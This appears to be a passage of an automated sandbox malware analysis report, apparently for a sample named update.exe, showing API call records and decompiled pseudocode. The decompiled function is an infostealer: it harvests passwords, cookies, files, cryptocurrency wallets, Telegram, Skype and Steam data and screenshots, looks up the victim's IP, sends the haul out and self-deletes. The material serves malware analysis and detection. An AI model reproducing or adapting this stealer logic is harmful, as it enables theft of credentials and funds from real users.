Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

ShutdownBlockReasonDestroy, xrefs: 00480B14
user32.dll, xrefs: 00480B19

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: a7eb69d71fc96fd2ddc9f0547160bb4e08446ee1fd4729be9739ec2ba6458bc7
Instruction ID: 2959378bc619908520cc3192cfb0d83b3cedef6012161ff5f635b626915d44a1
Opcode Fuzzy Hash: a7eb69d71fc96fd2ddc9f0547160bb4e08446ee1fd4729be9739ec2ba6458bc7
Instruction Fuzzy Hash: E9D0C77277171226569035FD1CD1E9F41CC4E5029D3250C77F600E2141D65DEC0553AC

Uniqueness

Uniqueness Score: -1.00%

Function 004FE938, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000,005015E7,?,?,000000EC,00000000), ref: 004FE942

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

user32.dll, xrefs: 004FE93D
DisableProcessWindowsGhosting, xrefs: 004FE938

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: b750718c54b1d66c76d5268335dadb66959e94e7d35c1e60bece79ba6f437278
Instruction ID: f581f122bcf6faacbdd4851cc66fbe71bba6765382ad350e4d823a968a8ec416
Opcode Fuzzy Hash: b750718c54b1d66c76d5268335dadb66959e94e7d35c1e60bece79ba6f437278
Instruction Fuzzy Hash: 5DB092E024030B20E89036B30C02F7E0988098070AB20082B3710E01E6DDEDC801903E

Uniqueness

Uniqueness Score: -1.00%

Function 004B0150, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 004B016F
Sleep.KERNEL32(?), ref: 004B017F
GetLastError.KERNEL32 ref: 004B0192
GetLastError.KERNEL32 ref: 004B019C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 51e7a4d6bfb563997e35078934fd1a3bf627bf613b2faa6de6283fa9a5e4b87e
Instruction ID: 92681db64e874939f8d1900fd927e10286de231ff93eb9788c8e0b68939e36e1
Opcode Fuzzy Hash: 51e7a4d6bfb563997e35078934fd1a3bf627bf613b2faa6de6283fa9a5e4b87e
Instruction Fuzzy Hash: 2DF05073A01214775B38A59F8D419DFB65DDA4175671002ABF444D7305D93FCD4243BC

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: update.exe PID: 5720 Parent PID: 4668 update.exeCOMMON

Executed Functions

Function 004186C4, Relevance: 102.6, APIs: 4, Strings: 54, Instructions: 1056
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004186C4(char __eax, void* __ebx, void* __edi, signed int __esi, void* __fp0) {
				void* _v3;
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				void* _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v92;
				char* _v96;
				char _v100;
				char _v104;
				char* _v108;
				void* _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				void* _v344;
				void* _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				void* _t443;
				void* _t449;
				intOrPtr* _t450;
				intOrPtr* _t617;
				intOrPtr* _t624;
				intOrPtr* _t631;
				intOrPtr* _t638;
				intOrPtr* _t652;
				intOrPtr* _t653;
				intOrPtr* _t654;
				intOrPtr* _t657;
				intOrPtr* _t658;
				intOrPtr* _t661;
				intOrPtr* _t662;
				intOrPtr* _t665;
				intOrPtr* _t673;
				void* _t679;
				intOrPtr* _t716;
				intOrPtr* _t752;
				intOrPtr* _t753;
				intOrPtr _t758;
				signed int _t808;
				intOrPtr* _t829;
				intOrPtr* _t832;
				signed int _t839;
				signed int _t886;
				int _t922;
				void* _t935;
				void* _t937;
				void* _t939;
				intOrPtr* _t946;
				intOrPtr* _t949;
				intOrPtr* _t950;
				intOrPtr* _t951;
				signed int _t964;
				signed int _t965;
				void* _t966;
				void* _t990;
				intOrPtr _t998;
				intOrPtr _t1016;
				intOrPtr* _t1088;
				void* _t1109;
				intOrPtr* _t1111;
				intOrPtr* _t1113;
				intOrPtr* _t1115;
				void* _t1125;
				void* _t1153;
				void* _t1155;
				void* _t1156;
				intOrPtr _t1160;
				intOrPtr _t1162;
				void* _t1165;
				void* _t1192;
				void* _t1198;
				void* _t1206;
				void* _t1209;

				_t1209 = __fp0;
				_t1157 = __esi;
				_t1151 = __edi;
				_t963 = __ebx;
				_t1160 = _t1162;
				_t966 = 0x50;
				do {
					_push(0);
					_push(0);
					_t966 = _t966 - 1;
					_t1163 = _t966;
				} while (_t966 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1160);
				_push(0x41985e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1162;
				E004034E4( &_v76);
				_v86 = 0;
				_v85 = 0;
				E0040357C( &_v92, 0x41987c);
				E00405668();
				E00407DE0( &_v308, _t1163);
				_push( &_v308);
				E00406CE8( &_v312, __ebx, __esi); // executed
				_pop(_t443);
				E00403798(_t443, _v312);
				_t449 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v112 = _t449;
				_t450 =  *0x41b12c; // 0x41c6a4
				if( *((intOrPtr*)( *_t450))() == 0xb7) {
					L71:
					_pop(_t998);
					 *[fs:eax] = _t998;
					_push(E00419868);
					E004034E4( &_v644);
					E00403BF4( &_v640, 2);
					E004034E4( &_v632);
					E00403BF4( &_v628, 5);
					E00403508( &_v608, 9);
					E00403BDC( &_v572);
					E00403508( &_v568, 2);
					E00403BDC( &_v560);
					E00403508( &_v556, 2);
					E00403BDC( &_v548);
					E00403508( &_v544, 2);
					E00403BDC( &_v536);
					E00403508( &_v532, 2);
					E00403BDC( &_v524);
					E00403508( &_v520, 2);
					E00403BDC( &_v512);
					E00403508( &_v508, 2);
					E00403BDC( &_v500);
					E00403508( &_v496, 2);
					E00403BDC( &_v488);
					E00403508( &_v484, 0xa);
					E00403BF4( &_v444, 2);
					E004034E4( &_v436);
					E00403BF4( &_v432, 3);
					E004034E4( &_v420);
					E00403BF4( &_v416, 2);
					E004034E4( &_v408);
					E00403BF4( &_v404, 8);
					E004034E4( &_v372);
					E00403BF4( &_v368, 4);
					E00403508( &_v352, 0xc);
					E004034E4( &_v68);
					_t1016 =  *0x405f50; // 0x405f54
					E00404280( &_v64, 5, _t1016);
					E00403508( &_v44, 8);
					E004034E4( &_v8);
					 *0x8dfffe9c =  *0x8dfffe9c + 0xba +  *0xba;
					return E00403508(0xba +  *0xba, 5);
				}
				E0040357C( &_v16, 0x419888);
				E00416DD4( &_v16, __ebx, 0x80000, 0x419928, __edi, __esi);
				E004069A8(_v16, _t963,  &_v316, __edi, _t1157);
				E0040357C( &_v16, _v316);
				E00406CE8( &_v324, _t963, _t1157); // executed
				E00406834(_v324, _t963, 0x80000,  &_v320, _t1151, _t1157);
				E004037DC( &_v36, _v320, 0x419934);
				E00416DD4( &_v36, _t963, 0x80000, _v92, _t1151, _t1157);
				E00417D84(_v16, _t963, _v36, _t1151, _t1157,  &_v20); // executed
				E00416DD4( &_v20, _t963, 0x80000, _v92, _t1151, _t1157);
				_t1165 = E00403790(_v20) - 0x2710;
				if(_t1165 < 0) {
					goto L71;
				}
				E004038DC(_v20, 0x419940);
				if(_t1165 == 0) {
					goto L71;
				}
				E004074E8(0x419960, _t963, 0x419950, _v20, _t1157,  &_v328);
				E004069A8(_v328, _t963,  &_v40, _t1151, _t1157);
				E004074E8(0x41997c, _t963, 0x41996c, _v20, _t1157,  &_v332);
				E00406B08(_v332, _t963,  &_v44, _t1151, _t1157);
				E00407A18(0x419988,  &_v48, _v40, _t1165);
				_t978 = 0x419994;
				E004074E8(0x4199a4, _t963, 0x419994, _v20, _t1157,  &_v340);
				_t1035 =  &_v336;
				E004069A8(_v340, _t963,  &_v336, _t1151, _t1157);
				E00408180(_v336, _t1165);
				E00409668(_v44, _t963, _t1157, _t1165);
				E0040E630();
				_t1153 = E00404648(_v48) - 1;
				if(_t1153 < 0) {
					L51:
					_t238 =  &_v8; // 0x2b
					_push( *_t238);
					_push(0x419988);
					E0041698C( &_v460, _t963, _t1035, _t1153, _t1157);
					_push(_v460);
					E00403850();
					E0040E6D4(_v456, _t963, "System.txt", _t1153, _t1157);
					E00406CE8( &_v468, _t963, _t1157);
					E00406834(_v468, _t963, _t978,  &_v464, _t1153, _t1157);
					_push(_v464);
					_push(0x419ec0);
					E00407B08( &_v476, _t963, _t1153, _t1157);
					E00406834(_v476, _t963, _t978,  &_v472, _t1153, _t1157);
					_push(_v472);
					_push(0x419ec0);
					E00406BD8( &_v488);
					E0040377C( &_v484, _v488);
					E00406834(_v484, _t963, _t978,  &_v480, _t1153, _t1157);
					_push(_v480);
					_push(0x419ec0);
					E004066E4( &_v500, _t1193);
					E0040377C( &_v496, _v500);
					E00406834(_v496, _t963, _t978,  &_v492, _t1153, _t1157);
					_push(_v492);
					_push(0x419ec0);
					E00406634( &_v512);
					E0040377C( &_v508, _v512);
					E00406834(_v508, _t963, _t978,  &_v504, _t1153, _t1157);
					_push(_v504);
					_push(0x419ec0);
					E004065F0( &_v524);
					E0040377C( &_v520, _v524);
					E00406834(_v520, _t963, _t978,  &_v516, _t1153, _t1157);
					_push(_v516);
					_push(0x419ec0);
					_t617 =  *0x41b2a8; // 0x41b0b8
					E0040709C( *_t617, _t963,  &_v536, _t1157, _t1193);
					E0040377C( &_v532, _v536);
					E00406834(_v532, _t963, _t978,  &_v528, _t1153, _t1157);
					_push(_v528);
					_push(0x419ec0);
					_t624 =  *0x41b2c4; // 0x41b0b0
					E0040709C( *_t624, _t963,  &_v548, _t1157, _t1193);
					E0040377C( &_v544, _v548);
					E00406834(_v544, _t963, _t978,  &_v540, _t1153, _t1157);
					_push(_v540);
					_push(0x419ec0);
					_t631 =  *0x41b1cc; // 0x41b0b4
					E0040709C( *_t631, _t963,  &_v560, _t1157, _t1193);
					E0040377C( &_v556, _v560);
					E00406834(_v556, _t963, _t978,  &_v552, _t1153, _t1157);
					_push(_v552);
					_push(0x419ec0);
					_t638 =  *0x41b3f8; // 0x41b0ac
					E0040709C( *_t638, _t963,  &_v572, _t1157, _t1193);
					E0040377C( &_v568, _v572);
					E00406834(_v568, _t963, _t978,  &_v564, _t1153, _t1157);
					_push(_v564);
					_push(0x419ec0);
					E00406834(_v8, _t963, _t978,  &_v576, _t1153, _t1157);
					_push(_v576);
					_push(0x419ec0);
					E00407DE0( &_v584, _t1193);
					E00406834(_v584, _t963, _t978,  &_v580, _t1153, _t1157);
					_push(_v580);
					E00403850();
					_push("<info");
					_t652 =  *0x41b350; // 0x41b0bc
					_push( *_t652);
					_push(0x419edc);
					_push(_v28);
					_push("</info");
					_t653 =  *0x41b350; // 0x41b0bc
					_push( *_t653);
					_push(0x419edc);
					_push(0x419988);
					_push("<pwds");
					_t654 =  *0x41b350; // 0x41b0bc
					_push( *_t654);
					_push(0x419edc);
					E004063C8( &_v588, _t963, _t1153, _t1157);
					_push(_v588);
					_push("</pwds");
					_t657 =  *0x41b350; // 0x41b0bc
					_push( *_t657);
					_push(0x419edc);
					_push(0x419988);
					_push("<coks");
					_t658 =  *0x41b350; // 0x41b0bc
					_push( *_t658);
					_push(0x419edc);
					E00406560( &_v592, _t963, _t978, _t1153, _t1157);
					_push(_v592);
					_push("</coks");
					_t661 =  *0x41b350; // 0x41b0bc
					_push( *_t661);
					_push(0x419edc);
					_push(0x419988);
					_push("<file");
					_t662 =  *0x41b350; // 0x41b0bc
					_push( *_t662);
					_push(0x419edc);
					E0040E8D0( &_v596, _t963, _t1193);
					_push(_v596);
					_push("</file");
					_t665 =  *0x41b350; // 0x41b0bc
					_push( *_t665);
					_push(0x419edc);
					_push(0x419988);
					E00403850();
					_t1194 = _v85 - 1;
					if(_v85 == 1) {
						_push(_v24);
						_push("<ip");
						_t752 =  *0x41b350; // 0x41b0bc
						_push( *_t752);
						_push(0x419edc);
						_push(_v80);
						_push(0x419e90);
						_push(_v84);
						_push("</ip");
						_t753 =  *0x41b350; // 0x41b0bc
						_push( *_t753);
						_push(0x419edc);
						_push(0x419988);
						E00403850();
					}
					E00416DD4( &_v24, _t963, 0x80000, _v92, _t1153, _t1157);
					_t980 = 0;
					E00417D84(_v16, _t963, _v24, _t1153, _t1157,  &_v600);
					_t673 =  *0x41b3a0; // 0x41c6a0
					 *((intOrPtr*)( *_t673))(_v112);
					E00405114(0x419f74, _t963, _t1153, _t1157, _t1194);
					_t679 = E00403790(_v76);
					_t1195 = _t679 - 3;
					if(_t679 <= 3) {
						L65:
						E004099C0(_t963, _t1157);
						E00407DE0( &_v608, _t1206);
						E004038DC(_v608, 0x419fa4);
						if(_t1206 != 0) {
							L68:
							E004038DC(_v8, 0x419fb0);
							if(__eflags == 0) {
								__eflags = _v86 - 1;
								if(_v86 == 1) {
									E004028E0( &_v304, 0x3c);
									_v304 = 0x3c;
									_v300 = 0x1c0;
									_v296 = 0;
									_v292 = 0;
									E004062FC(L"%comspec%",  &_v612, __eflags);
									_v288 = E00403D98(_v612);
									E004062FC(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v620, __eflags);
									E00402754(0,  &_v632);
									E00403D88( &_v628, _v632);
									E004077C8(_v628, _t963, 0,  &_v624, _t1157, __eflags);
									E00403E78();
									_v284 = E00403D98(_v616);
									E00402754(0,  &_v644);
									E00403D88( &_v640, _v644);
									E00407854(_v640, _t963, 0,  &_v636, _t1157, __eflags);
									_v280 = E00403D98(_v636);
									__eflags = 0;
									_v276 = 0;
									_t716 =  *0x41b150; // 0x41c764
									 *((intOrPtr*)( *_t716))( &_v304, E0041A02C, _v624, _v620);
									ExitProcess(0);
								}
							}
							goto L71;
						}
						E004038DC(_v8, 0x419fb0);
						if(_t1206 != 0) {
							goto L68;
						}
						E00407E90(_t963, _t980, _t1153, _t1157, _t1206);
						goto L71;
					} else {
						_t980 =  &_v56;
						E00407A18(0x419988,  &_v56, _v76, _t1195);
						_t1153 = E00404648(_v56) - 1;
						if(_t1153 < 0) {
							goto L65;
						}
						_t1155 = _t1153 + 1;
						_t964 = 0;
						do {
							_push(0);
							E00404804();
							_t1162 = _t1162 + 4;
							_t980 =  &_v60;
							E00407A18(0x419db4,  &_v60,  *((intOrPtr*)(_v56 + _t964 * 4)), 0);
							_t1198 = E00404648(_v60) - 4;
							if(_t1198 != 0) {
								goto L64;
							}
							E004038DC( *_v60, 0x419f80);
							if(_t1198 != 0) {
								goto L64;
							}
							_t980 =  &_v64;
							E00407A18(0x419f8c,  &_v64,  *((intOrPtr*)(_v60 + 0xc)), _t1198);
							_v87 = 0;
							_t1157 = E00404648(_v64) - 1;
							if(_t1157 < 0) {
								L62:
								_t1204 = _v87 - 1;
								if(_v87 == 1) {
									E004038DC( *((intOrPtr*)(_v60 + 8)), 0x419f98);
									E0041841C( *((intOrPtr*)(_v60 + 4)), _t964, 0x419f00 | _t1204 == 0x00000000, _t1155, _t1157);
								}
								goto L64;
							}
							_t1157 = _t1157 + 1;
							_v72 = 0;
							while(1) {
								E0040633C( *((intOrPtr*)(_v64 + _v72 * 4)), _t964,  &_v604, _t1155, _t1157);
								_t1088 =  *0x41b154; // 0x41c66c
								_v87 = E00403AD4(_v604,  *_t1088) != 0;
								if(_v87 == 1) {
									goto L62;
								}
								_v72 = _v72 + 1;
								_t1157 = _t1157 - 1;
								if(_t1157 != 0) {
									continue;
								}
								goto L62;
							}
							goto L62;
							L64:
							_t964 = _t964 + 1;
							_t1155 = _t1155 - 1;
							_t1206 = _t1155;
						} while (_t1206 != 0);
						goto L65;
					}
				} else {
					_t1156 = _t1153 + 1;
					_t965 = 0;
					do {
						if(E00403790( *((intOrPtr*)(_v48 + _t965 * 4))) < 5) {
							goto L50;
						}
						if(_t965 == 0) {
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 9)) == 0x2b) {
								E00413BE8();
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 3)) == 0x2b) {
								E00414DE8(L"Coins", _t965, _t1156, _t1157);
								_t935 = E00413F58(L"%appdata%\\Electrum\\wallets\\", _t965, L"Coins\\Electrum", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
								_t1111 =  *0x41b2c4; // 0x41b0b0
								 *_t1111 =  *_t1111 + _t935;
								_t937 = E00413F58(L"%appdata%\\Electrum-LTC\\wallets\\", _t965, L"Coins\\Electrum-LTC", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
								_t1113 =  *0x41b2c4; // 0x41b0b0
								 *_t1113 =  *_t1113 + _t937;
								_t939 = E00413F58(L"%APPDATA%\\Ethereum\\keystore\\", _t965, L"Coins\\Ethereum", L"UTC*", _t1156, _t1157, 0, 0, 1, 0x1388, 0);
								_t1115 =  *0x41b2c4; // 0x41b0b0
								 *_t1115 =  *_t1115 + _t939;
								if(E00413F58(L"%APPDATA%\\Exodus\\", _t965, L"Coins\\Exodus", L"*.json,*.seco", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t951 =  *0x41b2c4; // 0x41b0b0
									 *_t951 =  *_t951 + 1;
								}
								if(E00413F58(L"%APPDATA%\\Jaxx\\Local Storage\\", _t965, L"Coins\\Jaxx\\Local Storage\\", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t950 =  *0x41b2c4; // 0x41b0b0
									 *_t950 =  *_t950 + 1;
								}
								_t978 = L"Coins\\MultiBitHD";
								_t1035 = L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml";
								if(E00413F58(L"%APPDATA%\\MultiBitHD\\", _t965, L"Coins\\MultiBitHD", L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t949 =  *0x41b2c4; // 0x41b0b0
									 *_t949 =  *_t949 + 1;
								}
								_t946 =  *0x41b2c4; // 0x41b0b0
								_t1180 =  *_t946;
								if( *_t946 > 0) {
									E00405114(0x419cd8, _t965, _t1156, _t1157, _t1180);
								}
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 4)) == 0x2b) {
								E00414808(L"Skype", _t965, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 5)) == 0x2b) {
								_t978 = L"Telegram";
								_t1035 = L"D877F783D5*,map*";
								E00413F58(L"%appdata%\\Telegram Desktop\\tdata\\", _t965, L"Telegram", L"D877F783D5*,map*", _t1156, _t1157, 0, 0, 1, 0x3e8, 0);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 6)) == 0x2b) {
								E00414A90(L"Steam", _t965, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 7)) == 0x2b) {
								_push(0);
								_push(0x32);
								_push(L"image/jpeg");
								_push( &_v68);
								_push(GetSystemMetrics(1));
								_t922 = GetSystemMetrics(0);
								_t978 = 0;
								_pop(_t1109);
								E00416FB0(_t922, _t965, 0, _t1109, _t1156, _t1157);
								_t1035 = "scr.jpg";
								E0040E6D4(_v68, _t965, "scr.jpg", _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)) + 8)) == 0x2b) {
								_v86 = 1;
							}
						}
						_t758 = _v48;
						_t1187 =  *((char*)( *((intOrPtr*)(_t758 + _t965 * 4)))) - 0x46;
						if( *((char*)( *((intOrPtr*)(_t758 + _t965 * 4)))) != 0x46) {
							L44:
							if( *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)))) == 0x4c) {
								_push(_v76);
								_push( *((intOrPtr*)(_v48 + _t965 * 4)));
								_push(0x419988);
								_t1035 = 3;
								E00403850();
							}
							_t1192 =  *((char*)( *((intOrPtr*)(_v48 + _t965 * 4)))) - 0x49;
							if(_t1192 == 0) {
								_t978 =  &_v52;
								E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t965 * 4)), _t1192);
								E004038DC( *((intOrPtr*)(_v52 + 4)), 0x419e20);
								if(_t1192 != 0) {
									_t1035 = "ip.txt";
									E0040E6D4( *((intOrPtr*)(_v52 + 4)), _t965, "ip.txt", _t1156, _t1157);
								} else {
									_v85 = 1;
									E00417D84("http://ip-api.com/json", _t965, 0, _t1156, _t1157,  &_v32);
									E004074E8("\"query\":\"", _t965, 0x419e58, _v32, _t1157,  &_v80);
									_t978 = 0x419e58;
									E004074E8("\"countryCode\":\"", _t965, 0x419e58, _v32, _t1157,  &_v84);
									_push(_v80);
									_push(0x419e90);
									_push(_v84);
									E00403850();
									_t1035 = "ip.txt";
									E0040E6D4(_v452, _t965, "ip.txt", _t1156, _t1157);
								}
							}
						} else {
							E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t965 * 4)), _t1187);
							E0040357C( &_v96,  *((intOrPtr*)(_v52 + 8)));
							if(E00403AD4(0x419dc0, _v96) != 1) {
								E00403D88( &_v424,  *((intOrPtr*)(_v52 + 0x1c)));
								_push(_v424);
								E00403D88( &_v428,  *((intOrPtr*)(_v52 + 0x10)));
								_push(E00407108(_v428, _t965,  &_v52, __eflags));
								_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
								_t808 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
								_t192 = __eflags == 0;
								__eflags = _t192;
								_push(_t808 & 0xffffff00 | _t192);
								_push(1);
								_push("Files\\");
								_push( *((intOrPtr*)(_v52 + 4)));
								_push(0x419de8);
								E00403850();
								E00403D88( &_v432, _v436);
								_push(_v432);
								E00403D88( &_v440,  *((intOrPtr*)(_v52 + 0xc)));
								_push(_v440);
								E004037DC( &_v448, 0x419de8,  *((intOrPtr*)(_v52 + 8)));
								E00403D88( &_v444, _v448);
								_pop(_t1035);
								_pop(_t978);
								E00413F58(_v444, _t965, _t978, _t1035, _t1156, _t1157);
								goto L44;
							}
							_t978 = 0x419dd0;
							_t1035 = _v96;
							E004074E8(0x419dc0, _t965, 0x419dd0, _v96, _t1157,  &_v108);
							_push( &_v241);
							_push(0x81);
							_t829 =  *0x41b240; // 0x41c6f8
							if( *((intOrPtr*)( *_t829))() == 0) {
								goto L71;
							}
							_t1157 =  &_v241;
							while( *_t1157 != 0) {
								_t832 =  *0x41b114; // 0x41c6fc
								E0040709C( *((intOrPtr*)( *_t832))(_t1157), _t965,  &_v356, _t1157, __eflags);
								E0040377C( &_v352, _v356);
								_t1035 = _v108;
								_t839 = E00403AD4(_v352, _v108);
								__eflags = _t839;
								if(_t839 != 0) {
									_push( &_v360);
									E00403CF4( &_v364, _t1157);
									_push(_v364);
									_push("%DSK_");
									_push(_v108);
									E00403850();
									E00403D88( &_v368, _v372);
									_push(_v368);
									E00403D88( &_v376, _v96);
									_pop(_t1125);
									_t990 = 0x419ddc;
									E0040717C(_v376, _t965, _t990, _t1125);
									E0040377C( &_v104, _v360);
									E004034E4( &_v100);
									_push( *((intOrPtr*)(_v52 + 4)));
									_push(0x419de8);
									_push(_v104);
									E00403850();
									E00403D88( &_v384, _v100);
									E0040717C(_v384, _t965, 0, 0x419df0,  &_v380);
									E00403DB4( &_v380, 0, 0x419df8, __eflags);
									E0040377C( &_v100, _v380);
									E00403D88( &_v392, _v100);
									E004078D8(_v392, _t965,  &_v388, __eflags);
									E0040377C( &_v100, _v388);
									E00403D88( &_v396,  *((intOrPtr*)(_v52 + 0x1c)));
									_push(_v396);
									E00403D88( &_v400,  *((intOrPtr*)(_v52 + 0x10)));
									_push(E00407108(_v400, _t965, 0, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
									_t886 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
									_t162 = __eflags == 0;
									__eflags = _t162;
									_push(_t886 & 0xffffff00 | _t162);
									_push(1);
									E004037DC( &_v408, _v100, "Files\\");
									E00403D88( &_v404, _v408);
									_push(_v404);
									E00403D88( &_v412,  *((intOrPtr*)(_v52 + 0xc)));
									_push(_v412);
									E004037DC( &_v420, 0x419de8, _v104);
									E00403D88( &_v416, _v420);
									_pop(_t1035);
									_pop(_t978);
									E00413F58(_v416, _t965, _t978, _t1035, _t1156, _t1157);
								}
								_t1157 = _t1157 + 4;
								__eflags = _t1157;
							}
							goto L44;
						}
						L50:
						_t965 = _t965 + 1;
						_t1156 = _t1156 - 1;
						_t1193 = _t1156;
					} while (_t1156 != 0);
					goto L51;
				}
			}

0x004186c4
0x004186c4
0x004186c4
0x004186c4
0x004186c5
0x004186c7
0x004186cc
0x004186cc
0x004186ce
0x004186d0
0x004186d0
0x004186d0
0x004186d3
0x004186d4
0x004186d5
0x004186d6
0x004186dc
0x004186e3
0x004186e4
0x004186e9
0x004186ec
0x004186f2
0x004186f7
0x004186fb
0x00418707
0x0041870c
0x00418717
0x00418722
